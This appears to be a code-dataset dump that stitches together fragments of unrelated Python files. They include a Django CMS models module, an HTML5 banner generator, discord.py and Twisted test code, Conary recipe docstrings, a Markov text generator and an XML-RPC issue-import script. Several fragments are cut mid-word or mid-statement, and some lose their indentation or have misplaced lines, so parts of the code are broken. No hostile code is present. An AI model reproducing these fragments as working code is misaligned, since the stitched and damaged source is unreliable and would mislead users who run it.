eq_.description = "list_folder: %s" % desc
yield eq_, set(expected), set(output)
del eq_.description
|
cmjatai/cmj
|
cmj/sigad/models.py
|
Python
|
gpl-3.0
| 49,449 | 0.000243 |
from datetime import datetime
import io
import os
import tempfile
import zipfile
from PIL import Image, ImageFont
from PIL.Image import LANCZOS
from PIL.ImageDraw import Draw
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.fields.jsonb import JSONField
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import File
from django.core.files.storage import FileSystemStorage
from django.core.serializers.json import DjangoJSONEncoder
from django.db import models
from django.db.models import Q, F
from django.db.models.deletion import PROTECT, CASCADE
from django.http.response import HttpResponse
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField as django_extensions_JSONField
from reportlab.lib.pagesizes import A4, landscape
from reportlab.pdfgen import canvas
from reportlab.platypus.doctemplate import SimpleDocTemplate
import qrcode
from cmj import globalrules
from cmj.core.models import AuditLog
from cmj.mixins import CmjChoices
from cmj.utils import get_settings_auth_user_model, YES_NO_CHOICES, \
restringe_tipos_de_arquivo_midias, TIPOS_IMG_PERMITIDOS, \
media_protected_storage
from sapl.materia.models import MateriaLegislativa
from sapl.parlamentares.models import Parlamentar
CLASSE_ESTRUTURAL = 0
CLASSE_DOCUMENTAL = 1
CLASSE_MISTA = 2
PERFIL_CLASSE = (
    (CLASSE_ESTRUTURAL, _('Classe Estrutural')),
    (CLASSE_DOCUMENTAL, _('Classe de Conteúdo')),
    (CLASSE_MISTA, _('Classe Mista')),
)
DOC_TEMPLATES_CHOICE_FILES = {
1: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
2: {
'template_name': 'path/path_thumbnails.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
99: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
}
DOC_TEMPLATES_CHOICE = CmjChoices(
(1, 'noticia', _('Notícia Pública')),
(2, 'galeria', _('Galeria de Imagens')),
)
CLASSE_TEMPLATES_CHOICE_FILES = {
1: 'path/path_classe.html',
2: 'path/path_galeria.html',
3: 'path/path_parlamentares.html',
4: 'path/path_parlamentar.html',
5: 'path/path_galeria.html',
6: 'path/path_classe.html',
7: 'path/path_galeria_video.html',
99: 'path/path_documento.html',
}
CLASSE_DOC_MANAGER_CHOICE = {
1: 'qs_news',
2: 'view_public_gallery',
3: 'qs_news',
4: 'qs_news',
5: 'qs_bi',
6: 'qs_audio_news',
7: 'qs_video_news',
99: None,
}
CLASSE_TEMPLATES_CHOICE = CmjChoices(
(1, 'lista_em_linha', _('Listagem em Linha')),
(2, 'galeria', _('Galeria Albuns')),
(3, 'parlamentares', _('Página dos Parlamentares')),
(4, 'parlamentar', _('Página individual de Parlamentar')),
(5, 'fotografia', _('Banco de Imagens')),
(6, 'galeria_audio', _('Galeria de Áudios')),
(7, 'galeria_video', _('Galeria de Vídeos')),
(99, 'documento_especifico', _('Documento Específico')),
)
class Parent(models.Model):
parent = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='childs',
verbose_name=_('Filhos'),
on_delete=PROTECT)
raiz = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='nodes',
verbose_name=_('Containers'),
on_delete=PROTECT)
related_classes = models.ManyToManyField(
'self', blank=True,
verbose_name=_('Classes Relacionadas'))
class Meta:
abstract = True
@property
def parents(self):
if not self.parent:
return []
parents = self.parent.parents + [self.parent, ]
return parents
@property
def parents_and_me(self):
if not self.parent:
return [self]
parents = self.parent.parents + [self.parent, self]
return parents
@property
def classes_parents(self):
if not hasattr(self, 'classe'):
return self.parents
_p = self.parents
p = _p or [self]
parents = p[0].classe.parents_and_me + _p
return parents
@property
def classes_parents_and_me(self):
if not hasattr(self, 'classe'):
return self.parents_and_me
p = self.parents_and_me
|
parents = p[0].classe.parents_and_me + p
return parents
def treechilds2list(self):
yield self
for child in self.childs.view_childs():
for item in child.treechilds2list():
yield item
class CMSMixin(models.Model):
|
STATUS_PRIVATE = 99
STATUS_RESTRICT = 1
STATUS_PUBLIC = 0
VISIBILIDADE_STATUS = CmjChoices(
(STATUS_RESTRICT, 'status_restrict', _('Restrito')),
(STATUS_PUBLIC, 'status_public', _('Público')),
(STATUS_PRIVATE, 'status_private', _('Privado')),
)
ALINHAMENTO_LEFT = 0
ALINHAMENTO_JUSTIFY = 1
ALINHAMENTO_RIGHT = 2
ALINHAMENTO_CENTER = 3
alinhamento_choice = CmjChoices(
(ALINHAMENTO_LEFT, 'alinhamento_left', _('Alinhamento Esquerdo')),
(ALINHAMENTO_JUSTIFY, 'alinhamento_justify', _('Alinhamento Completo')),
(ALINHAMENTO_RIGHT, 'alinhamento_right', _('Alinhamento Direito')),
(ALINHAMENTO_CENTER, 'alinhamento_center', _('Alinhamento Centralizado')),
)
TD_NEWS = 0
TD_DOC = 5
TD_BI = 10
TD_GALERIA_PUBLICA = 20
TD_AUDIO_NEWS = 30
TD_VIDEO_NEWS = 40
TPD_TEXTO = 100
TPD_FILE = 200
TPD_CONTAINER_SIMPLES = 700
TPD_CONTAINER_EXTENDIDO = 701
TPD_CONTAINER_FILE = 750
TPD_VIDEO = 800
TPD_AUDIO = 850
TPD_IMAGE = 900
TPD_GALLERY = 901
    # Complete documents
TDs = (TD_NEWS, TD_DOC, TD_BI, TD_GALERIA_PUBLICA,
TD_AUDIO_NEWS, TD_VIDEO_NEWS)
# Containers
TDc = (TPD_CONTAINER_SIMPLES, TPD_CONTAINER_EXTENDIDO, TPD_CONTAINER_FILE)
    # Parts
TDp = (TPD_TEXTO, TPD_FILE, TPD_VIDEO, TPD_AUDIO, TPD_IMAGE, TPD_GALLERY)
    # Types not directly accessible via URL
TDp_exclude_render = (TPD_TEXTO,
TPD_CONTAINER_SIMPLES,
TPD_CONTAINER_EXTENDIDO,
TPD_VIDEO,
TPD_AUDIO)
tipo_parte_doc = {
'documentos': CmjChoices(
(TD_NEWS, 'td_news', _('Notícias')),
(TD_DOC, 'td_doc', _('Documento')),
(TD_BI, 'td_bi', _('Banco de Imagem')),
(TD_GALERIA_PUBLICA, 'td_galeria_publica', _('Galeria Pública')),
(TD_AUDIO_NEWS, 'td_audio_news', _('Áudio Notícia')),
(TD_VIDEO_NEWS, 'td_video_news', _('Vídeo Notícia')),
),
'containers': CmjChoices(
(TPD_CONTAINER_SIMPLES,
'container', _('Container Simples')),
(TPD_CONTAINER_EXTENDIDO,
'container_fluid', _('Container Extendido')),
(TPD_CONTAINER_FILE,
'container_file', _('Container de Imagens para Arquivo PDF')),
),
'subtipos': CmjChoices(
(TPD_TEXTO, 'tpd_texto', _('Texto')),
(TPD_FILE, 'tpd_file', _('Arquivo')),
(TPD_VIDEO, 'tpd_video', _('Vídeo')),
(TPD_AUDIO, 'tpd_audio', _('Áudio')),
(TPD_IMAGE, 'tpd_image', _('Imagem')),
(TPD_GALLERY, 'tpd_gallery', _('Galeria de Imagens')),
)
}
tipo_parte_doc_choice = (tipo_parte_doc['documentos'] +
tipo_parte_doc['containers'] +
tipo_parte_doc['subtipos'])
created = models.DateTimeField(
verbose_name=_('created'), editable=False, auto_now_add=True)
public_date = models.DateTimeField(
null=True, default=None,
verbose_n
|
tsantor/banner-ad-toolkit
|
adkit/generate_html.py
|
Python
|
mit
| 5,427 | 0.00129 |
# -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import sys
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
"""Generates HTML for HTML5 banner ads."""
def __init__(self):
self.logger = logging.getLogger(__name__)
super(Main, self).__init__()
# def copy_files(self):
# """Copy files."""
# dest = os.path.join(self.input_dir, 'js')
# if not os.path.isdir(dest):
# if self.verbose:
    #             logmsg.info('Creating "js" directory...')
# shutil.copytree(self.get_data('js'), dest)
# else:
# if self.verbose:
# logmsg.warning('"js" directory already exists')
@staticmethod
def replace_all(text, dict):
"""Replace all."""
for src, target in six.iteritems(dict):
text = text.replace(src, target)
return text
def create_divs(self, dirpath):
jpg_files = self.get_files_matching(dirpath, '*.jpg')
png_files = self.get_files_matching(dirpath, '*.png')
all_files = jpg_files + png_files
output = ''
for f in all_files:
basename = os.path.basename(f)
name = os.path.splitext(basename)[0]
if basename in self.ignore_list:
continue
output += '<div id="{0}"></div>\n'.format(name)
# soup=BeautifulSoup(output, "html.parser")
# pretty_html=soup.prettify()
return output
def create_html(self, filename):
"""
Create a HTML file for an ad.
:param str size: width x height (eg - 300x250)
:param str name: output file name
:rtype bool:
"""
# get filename and extension
# basename = os.path.basename(filename)
# name = os.path.splitext(basename)[0]
dirpath = os.path.dirname(filename)
# get size
# size = self.get_size_from_filename(name)
size = self.get_size_from_dirname(filename)
# get width height based on size string (eg - 300x250)
width, height = size.split('x')
# create divs
divs = self.create_divs(dirpath)
# open the template and open a new file for writing
html = pkg_resources.resource_string(__name__, 'templates/' + self.type + '/index.html').decode("utf-8")
#print(html)
outfile = open(filename, 'w')
# replace the variables with the correct value
replacements = {
# '{{filename}}': name,
# '{{size}}': size,
'{{width}}': width,
'{{height}}': height,
'{{divs}}': divs,
}
html = Main.replace_all(html, replacements)
outfile.write(html)
outfile.close()
logmsg.success('"{0}" generated successfully'.format(filename))
def generate_html(self, dirs):
"""
Loop through all folders in the input directory and create an HTML page.
"""
num_files = 0
for d in dirs:
filepath = os.path.join(d, 'index.html')
if not os.path.exists(filepath):
self.create_html(filepath)
num_files+=1
else:
logmsg.warning('"{0}" already exists'.format(filepath))
logmsg.success('Generated {0} HTML files'.format(num_files))
def get_parser(self):
"""Return the parsed command line arguments."""
parser = argparse.ArgumentParser(
description='Generate HTML for banners..')
parser.add_argument('type', choices=['doubleclick', 'sizemek', 'adwords', 'dcm'], help='Ad type')
parser.add_argument('-l', '--log', help='Enable logging',
action='store_true')
return parser.parse_args()
def run(self):
"""Run script."""
config = self.get_config()
args = self.get_parser()
if args.log:
self.create_logger()
self.logger.debug('-' * 10)
self.type = args.type
self.input_dir = config.get('html5', 'input')
self.ignore_list = self.create_list(config.get('html5', 'exclude_list'))
# Check if the input dir exists
if not os.path.isdir(self.input_dir):
logmsg.error('"{0}" does not exist'.format(self.input_dir))
sys.exit()
# Do the stuff we came here to do
dirs = self.find_ad_dirs()
self.generate_html(dirs)
logmsg.success('HTML Generated')
# -----------------------------------------------------------------------------
def main():
"""Main script."""
script = Main()
script.run()
# -----------------------------------------------------------------------------
if __name__ == "__main__":
main()
|
Aurous/Magic-Discord-Bot
|
discord/__init__.py
|
Python
|
gpl-3.0
| 1,365 | 0.001465 |
# -*- coding: utf-8 -*-
"""
Discord API Wrapper
~~~~~~~~~~~~~~~~~~~
A basic wrapper for the Discord API.
:copyright: (c) 2015-2016 Rapptz
:license: MIT, see LICENSE for more details.
"""
__title__ = 'discord'
__author__ = 'Rapptz'
__license__ = 'MIT'
__copyright__ = 'Copyright 2015-2016 Rapptz'
__version__ = '0.11.0'
from .client import Client, AppInfo, ChannelPermissions
from .user import User
from .game import Game
from .channel import Channel, PrivateChannel
from .server import Server
from .member import Member, VoiceState
from .message import Message
from .errors import *
from .calls import CallMessage, GroupCall
from .permissions import Permissions, PermissionOverwrite
from .role import Role
from .colour import Color, Colour
from .invite import Invite
from .object import Object
from . import utils, opus, compat
from .voice_client import VoiceClient
from .enums import ChannelType, ServerRegion, Status, MessageType
from collections import namedtuple
import logging
VersionInfo = namedtuple('VersionInfo', 'major minor micro releaselevel serial')
version_info = VersionInfo(major=0, minor=11, micro=0, releaselevel='final', serial=0)
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
|
Donkyhotay/MoonPy
|
twisted/web/test/test_distrib.py
|
Python
|
gpl-3.0
| 9,985 | 0.002203 |
# Copyright (c) 2008-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.distrib}.
"""
from os.path import abspath
from xml.dom.minidom import parseString
try:
import pwd
except ImportError:
pwd = None
from zope.interface.verify import verifyObject
from twisted.python import log, filepath
from twisted.internet import reactor, defer
from twisted.trial import unittest
from twisted.spread import pb
from twisted.web import http, distrib, client, resource, static, server
from twisted.web.test.test_web import DummyRequest
from twisted.web.test._util import _render
class MySite(server.Site):
def stopFactory(self):
if hasattr(self, "logFile"):
if self.logFile != log.logfile:
self.logFile.close()
del self.logFile
class PBServerFactory(pb.PBServerFactory):
def buildProtocol(self, addr):
self.proto = pb.PBServerFactory.buildProtocol(self, addr)
return self.proto
class DistribTest(unittest.TestCase):
port1 = None
port2 = None
sub = None
f1 = None
def tearDown(self):
dl = [defer.Deferred(), defer.Deferred()]
if self.f1 is not None:
self.f1.proto.notifyOnDisconnect(lambda: dl[0].callback(None))
else:
dl[0].callback(None)
if self.sub is not None:
self.sub.publisher.broker.notifyOnDisconnect(
lambda: dl[1].callback(None))
self.sub.publisher.broker.transport.loseConnection()
else:
dl[1].callback(None)
http._logDateTimeStop()
if self.port1 is not None:
dl.append(self.port1.stopListening())
if self.port2 is not None:
dl.append(self.port2.stopListening())
return defer.gatherResults(dl)
def testDistrib(self):
# site1 is the publisher
r1 = resource.Resource()
r1.putChild("there", static.Data("root", "text/plain"))
site1 = server.Site(r1)
self.f1 = PBServerFactory(distrib.ResourcePublisher(site1))
self.port1 = reactor.listenTCP(0, self.f1)
self.sub = distrib.ResourceSubscription("127.0.0.1",
self.port1.getHost().port)
r2 = resource.Resource()
r2.putChild("here", self.sub)
f2 = MySite(r2)
self.port2 = reactor.listenTCP(0, f2)
d = client.getPage("http://127.0.0.1:%d/here/there" % \
self.port2.getHost().port)
d.addCallback(self.failUnlessEqual, 'root')
return d
def test_requestHeaders(self):
"""
The request headers are available on the request object passed to a
distributed resource's C{render} method.
"""
requestHeaders = {}
class ReportRequestHeaders(resource.Resource):
def render(self, request):
requestHeaders.update(dict(
request.requestHeaders.getAllRawHeaders()))
return ""
distribRoot = resource.Resource()
distribRoot.putChild("headers", ReportRequestHeaders())
distribSite = server.Site(distribRoot)
self.f1 = distribFactory = PBServerFactory(
distrib.ResourcePublisher(distribSite))
distribPort = reactor.listenTCP(
0, distribFactory, interface="127.0.0.1")
self.addCleanup(distribPort.stopListening)
addr = distribPort.getHost()
self.sub = mainRoot = distrib.ResourceSubscription(
addr.host, addr.port)
mainSite = server.Site(mainRoot)
mainPort = reactor.listenTCP(0, mainSite, interface="127.0.0.1")
self.addCleanup(mainPort.stopListening)
mainAddr = mainPort.getHost()
request = client.getPage("http://%s:%s/headers" % (
mainAddr.host, mainAddr.port),
                                 headers={'foo': 'bar'})
def cbRequested(result):
self.assertEquals(requestHeaders['Foo'], ['bar'])
request.addCallback(cbRequested)
        return request
def test_connectionLost(self):
"""
If there is an error issuing the request to the remote publisher, an
error response is returned.
"""
# Using pb.Root as a publisher will cause request calls to fail with an
# error every time. Just what we want to test.
self.f1 = serverFactory = PBServerFactory(pb.Root())
self.port1 = serverPort = reactor.listenTCP(0, serverFactory)
self.sub = subscription = distrib.ResourceSubscription(
"127.0.0.1", serverPort.getHost().port)
request = DummyRequest([''])
d = _render(subscription, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 500)
# This is the error we caused the request to fail with. It should
# have been logged.
self.assertEqual(len(self.flushLoggedErrors(pb.NoSuchMethod)), 1)
d.addCallback(cbRendered)
return d
class _PasswordDatabase:
def __init__(self, users):
self._users = users
def getpwall(self):
return iter(self._users)
def getpwnam(self, username):
for user in self._users:
if user[0] == username:
return user
raise KeyError()
class UserDirectoryTests(unittest.TestCase):
"""
Tests for L{UserDirectory}, a resource for listing all user resources
available on a system.
"""
def setUp(self):
self.alice = ('alice', 'x', 123, 456, 'Alice,,,', self.mktemp(), '/bin/sh')
self.bob = ('bob', 'x', 234, 567, 'Bob,,,', self.mktemp(), '/bin/sh')
self.database = _PasswordDatabase([self.alice, self.bob])
self.directory = distrib.UserDirectory(self.database)
def test_interface(self):
"""
L{UserDirectory} instances provide L{resource.IResource}.
"""
self.assertTrue(verifyObject(resource.IResource, self.directory))
def _404Test(self, name):
"""
Verify that requesting the C{name} child of C{self.directory} results
in a 404 response.
"""
request = DummyRequest([name])
result = self.directory.getChild(name, request)
d = _render(result, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_getInvalidUser(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which does not correspond to any known
user.
"""
return self._404Test('carol')
def test_getUserWithoutResource(self):
"""
L{UserDirectory.getChild} returns a resource which renders a 404
response when passed a string which corresponds to a known user who has
neither a user directory nor a user distrib socket.
"""
return self._404Test('alice')
def test_getPublicHTMLChild(self):
"""
L{UserDirectory.getChild} returns a L{static.File} instance when passed
the name of a user with a home directory containing a I{public_html}
directory.
"""
home = filepath.FilePath(self.bob[-2])
public_html = home.child('public_html')
public_html.makedirs()
request = DummyRequest(['bob'])
result = self.directory.getChild('bob', request)
self.assertIsInstance(result, static.File)
self.assertEqual(result.path, public_html.path)
def test_getDistribChild(self):
"""
L{UserDirectory.getChild} returns a L{ResourceSubscription} instance
when passed the name of a user suffixed with C{".twistd"} who has a
home directory containing a I{.twistd-web-pb} socket.
"""
home = filepath.FilePath(self.bob[-2])
home.makedirs()
web = home.child('.twistd-web-pb')
request = DummyRequest(['bob'])
result = self.directory.getChild('bob.twistd', request)
self.assertIsInstance(result, distrib.ResourceSubscription)
self.assertEqual(
|
fedora-conary/conary
|
conary/build/defaultrecipes.py
|
Python
|
apache-2.0
| 27,584 | 0.000435 |
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
BaseRequiresRecipe = '''
class BaseRequiresRecipe(Recipe):
"""
NAME
====
B{C{BaseRequiresRecipe}} - Base class which provides basic buildRequires
for all recipes that follow the PackageRecipe approach to instantiating
a destination directory.
SYNOPSIS
========
C{BaseRequiresRecipe} is inherited by the other *PackageRecipe,
DerivedPackageRecipe and *InfoRecipe super classes.
DESCRIPTION
===========
The C{BaseRequiresRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, and conary)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
buildRequires offered by C{BaseRequiresRecipe}.
"""
name = "baserequires"
internalAbstractBaseClass = 1
buildRequires = [
'bash:runtime',
'conary-build:lib',
'conary-build:python',
'conary-build:runtime',
'conary:python',
'conary:runtime',
'coreutils:runtime',
'dev:runtime',
'filesystem:runtime',
'findutils:runtime',
'gawk:runtime',
'grep:runtime',
'python:lib',
'python:runtime',
'sed:runtime',
'setup:runtime',
'sqlite:lib',
]
_recipeType = None
'''
PackageRecipe = '''class PackageRecipe(SourcePackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{PackageRecipe}} - Base class which provides Conary functionality
SYNOPSIS
========
C{PackageRecipe} is inherited by the other *PackageRecipe super classes
DESCRIPTION
===========
The C{PackageRecipe} class provides Conary recipes with references to
the essential troves which offer Conary's packaging requirements.
(python, sqlite, gzip, bzip2, tar, cpio, and patch)
Other PackageRecipe classes such as C{AutoPackageRecipe} inherit the
functionality offered by C{PackageRecipe}.
EXAMPLE
=======
A sample class that uses PackageRecipe to download source code from
a web site, unpack it, run "make", then run "make install"::
class ExamplePackage(PackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addArchive('http://code.example.com/example/')
r.Make()
r.MakeInstall()
"""
name = 'package'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
groupDescription = '''A group refers to a collection of references to specific troves
(specific name, specific version, and specific flavor); the troves
may define all the software required to install a system, or sets of
troves that are available for a system, or other groups. Each group
may contain any kind of trove, including other groups, and groups
may reference other groups built at the same time as well as other
groups that exist in a repository.'''
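# Illustrative sketch (not part of the original file): a minimal group recipe
# of the kind documented by the GroupRecipe class below; the trove and group
# names are made up.
#
#     class GroupExample(GroupRecipe):
#         name = 'group-example'
#         version = '1.0'
#         def setup(r):
#             r.createGroup('group-core')
#             r.add('foo', groupName='group-core')
#             r.addNewGroup('group-core')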
GroupRecipe = '''
class GroupRecipe(_GroupRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{r.GroupRecipe()}} - Provides the original type of recipe interface
for creating groups.
DESCRIPTION
===========
The C{r.GroupRecipe} class provides the original interface for creating
groups that are stored in a Conary repository.
''' + groupDescription + '''
Most C{r.GroupRecipe} user commands accept a B{groupName}
parameter. This parameter specifies the group a particular command
applies to. For example, C{r.add('foo', groupName='group-bar')}
attempts to add the trove I{foo} to the group I{group-bar}.
The group specified by B{groupName} must exist, or be created before
troves may be added to it. The B{groupName} parameter may also be a list
    of groups in which case the command will be applied to all groups. If
B{groupName} is not specified, or is None, then the command will apply to
the current default group.
PARAMETERS
==========
Several parameters may be set at the time of group creation. Although
these parameters are typically passed to C{r.createGroup()} for the
base group, they should be set as variables in the recipe class.
Note: Setting these parameters affects not only the value for the base
    group, but also the default value for all newly created groups. For
example, if B{autoResolve} is set to C{True} in the base group, all other
groups created will have autoResolve set to C{True} by default.
    B{imageGroup} is an exception to this rule; it will not propagate to
sub groups.
The following parameters are accepted by C{r.GroupRecipe} with default
values indicated in parentheses when applicable:
B{depCheck} : (False) If set to C{True}, Conary will check for dependency
closure in this group, and raise an error if closure is not found.
B{autoResolve} : (False) If set to C{True}, Conary will include any extra
troves needed to make this group dependency complete.
B{checkOnlyByDefaultDeps} : (True) Conary only checks the
dependencies of troves that are installed by default, referenced in the
group. If set to C{False}, Conary will also check the dependencies of
B{byDefault} C{False} troves. Doing this, however, will prevent groups
with C{autoResolve}=C{True} from changing the C{byDefault} status of
required troves.
B{checkPathConflicts} : (True) Conary checks for path conflicts in each
group by default to ensure that the group can be installed without path
conflicts. Setting this parameter to C{False} will disable the check.
B{imageGroup} : (True) Indicates that this group defines a complete,
functioning system, as opposed to a group representing a system
component or a collection of multiple groups that might or might not
collectively define a complete, functioning system.
Image group policies will be executed separately for each image group.
This setting is recorded in the troveInfo for the group. This setting
    does not propagate to subgroups.
METHODS
=======
The following methods are applicable in Conary group recipes:
- L{add} : Adds a trove to a group
- L{addAll} : Add all troves directly contained in a given reference
to groupName
- L{addNewGroup} : Adds one newly created group to another newly
created group
- L{addReference} : (Deprecated) Adds a reference to a trove
- L{createGroup} : Creates a new group
- L{copyComponents}: Add components to one group by copying them
from the components in another group
- L{moveComponents}: Add components to one group, removing them
from the other in the process.
- L{remove} : Removes a trove
- L{removeComponents} : Define components which should not be
installed
- L{removeItemsAlsoInGroup}: removes troves in the group specified
that are also in the current group
- L{removeItemsAlsoInNewGroup}: removes troves in the group specified
that are also in the current group
- L{Requires} : Defines a runtime requirement for group
- L{requireLatest} : Raise an error if add* commands resolve to older
trove than the latest on branch. This can occur when a flavor of
a trove exists that is not the latest version.
- L{replace} : Replace troves
- L{setByDefault} : Set troves to be
|
JohnHwee/show-me-the-code
|
Python/0052/main.py
|
Python
|
gpl-2.0
| 1,327 | 0.024115 |
import random
def markov_analysis( fname, n ):
    """Reads a text file and performs Markov analysis.
Return a dictionary that maps from prefixes to a collection of suffixes.
fname: a text file
n: n order
"""
d = {}
prefix = tuple()
fin = open( fname )
for line in fin:
words = line.strip().split()
for word in words:
            if len( prefix ) < n:
                prefix += ( word, )
                continue
            # if there is no entry for this prefix, make one: d[prefix] = []
            d.setdefault( prefix, [] ).append( word )
            prefix = prefix[1:] + ( word, )
    fin.close()
    return d
def generate_random_text( suffix_map, n ):
"""Generates a random text with n words based on the Markov analysis.
"""
prefix = random.choice( suffix_map.keys() )
for i in range( n ):
suffixes = suffix_map.get( prefix, None )
        if suffixes is None:
            # if the prefix isn't in the map, we got to the end of the
            # original text, so we have to start again.
            generate_random_text( suffix_map, n - i )
return
word = random.choice( suffixes )
print word,
prefix = prefix[1:] + ( word, )
generate_random_text( markov_analysis( 'emma.txt', 2 ), 100 )
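# Illustrative check (not part of the original exercise): a tiny standalone
# demo of the prefix -> suffix mapping the analysis builds, so the shape of
# the dictionary can be seen without emma.txt.
def _demo_suffix_map(words, n=2):
    d, prefix = {}, tuple()
    for word in words:
        if len(prefix) < n:
            prefix += (word,)
            continue
        d.setdefault(prefix, []).append(word)
        prefix = prefix[1:] + (word,)
    return d
# _demo_suffix_map("the cat sat on the cat mat".split()) returns
# {('the', 'cat'): ['sat', 'mat'], ('cat', 'sat'): ['on'],
#  ('sat', 'on'): ['the'], ('on', 'the'): ['cat']}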
|
Lambdanaut/crits
|
crits/ips/migrate.py
|
Python
|
mit
| 869 | 0.003452 |
def migrate_ip(self):
"""
Migrate to the latest schema version.
"""
migrate_1_to_2(self)
migrate_2_to_3(self)
def migrate_2_to_3(self):
"""
Migrate from schema 2 to 3.
"""
if self.schema_version < 2:
migrate_1_to_2(self)
if self.schema_version == 2:
self.schema_version = 3
self.save()
self.reload()
def migrate_1_to_2(self):
"""
Migrate from schema 1 to 2.
"""
if self.schema_version < 1:
migrate_0_to_1(self)
if self.schema_version == 1:
from crits.core.core_migrate import migrate_analysis_results
migrate_analysis_results(self)
        self.schema_version = 2
self.save()
self.reload()
def migrate_0_to_1(self):
"""
Migrate from schema 0 to 1.
"""
if self.schema_version < 1:
        self.schema_version = 1
|
pyta-uoft/pyta
|
examples/ending_locations/async_for.py
|
Python
|
gpl-3.0
| 169 | 0 |
async def fun():
"""Note coroutine func
|
tion must be declared with async def."""
    async for a in b:
if a > 5:
break
else:
continue
|
3dfxsoftware/cbss-addons
|
issue_load/wizard/migrate.py
|
Python
|
gpl-2.0
| 6,250 | 0.00128 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 12 09:56:42 2012
@author: truiz
"""
from sys import argv
import xlrd
import xmlrpclib
from datetime import datetime
from ustr_test import ustr
def loadProjectsTasks(fileName, HOST, PORT, DB, USER, PASS):
ISSUES_PAGE = 0
TASKS_PAGE = 1
WORKS_PAGE = 2
''' Objects needed for rpc calls '''
url = 'http://%s:%d/xmlrpc/' % (HOST, PORT)
common_proxy = xmlrpclib.ServerProxy(url+'common')
object_proxy = xmlrpclib.ServerProxy(url+'object')
wizard_proxy = xmlrpclib.ServerProxy(url+'wizard')
workflow_proxy = xmlrpclib.ServerProxy(url+'workflow')
uid = common_proxy.login(DB, USER, PASS)
ID_ADDR = 1
def clean(cadena):
if isinstance(cadena, str):
return cadena and ustr(cadena).strip() or None
return cadena
def cleanDict(d):
res = {}
for k in d:
if not d[k] is None:
res.update({k: d[k]})
return res
def readSheet(fileName, nSheet):
# Open workbook
book = xlrd.open_workbook(fileName, formatting_info=True)
sheet = book.sheet_by_index(nSheet)
values = []
for T in range(sheet.nrows):
values.append([clean(v) for v in sheet.row_values(T)])
return values
def searchTasks(project_id, tasks):
res = []
for t in tasks:
if t[0] != 'ID':
if int(t[1]) == project_id:
res.append(t)
return res
def searchWorks(task_id, works):
res = []
for w in works:
if w[0] != 'ID TASK':
if int(w[0]) == task_id:
res.append(w)
return res
# Read project issue sheet
issues = readSheet(fileName, ISSUES_PAGE)
# Read project tasks sheet
tasks = readSheet(fileName, TASKS_PAGE)
# Read project work sheet
works = readSheet(fileName, WORKS_PAGE)
for issue in issues:
if issue[0] != 'ID':
if issue[4]:
user_mail = object_proxy.execute(
DB, uid, PASS, 'res.users', 'read', int(issue[4]),
['user_email'])
else:
user_mail['user_email'] = None
addr = issue[7] and (int(issue[
7]) == 3 and ID_ADDR or int(issue[7])) or None
values_issue = {
'name': ustr(issue[1]),
'categ_id': int(issue[3]),
'project_id': int(issue[2]),
'assigned_to': issue[4] and int(issue[4]) or None,
'type_id': int(issue[5]),
'partner_id': int(issue[6]),
'partner_address_id': addr,
'state': 'open',
'description': ustr(issue[8]),
'email_from': issue[4] and user_mail['user_email'] or None,
'active': True,
}
values_issue = cleanDict(values_issue)
project_id = object_proxy.execute(
DB, uid, PASS, 'project.issue', 'create', values_issue)
if project_id:
if issue[4]:
object_proxy.execute(DB, uid, PASS, 'project.issue',
'write', [
project_id],
{'assigned_to': int(issue[4]),
'user_id': int(issue[4])})
project_tasks = searchTasks(int(issue[0]), tasks)
if project_tasks:
for task in project_tasks:
values_tasks = {
'name': values_issue['name'],
'project_id': values_issue['project_id'],
'assigned_to': values_issue['assigned_to'],
'user_id': values_issue['assigned_to'],
'planned_hours': task[2],
'remaining_hours': task[3],
'type_id': values_issue['type_id'],
'partner_id': values_issue['partner_id'],
'state': 'open',
                            'date_start': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'date_end': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'description': values_issue['description'],
}
values_tasks = cleanDict(values_tasks)
task_id = object_proxy.execute(
DB, uid, PASS, 'project.task', 'create', values_tasks)
if task_id:
object_proxy.execute(DB, uid, PASS,
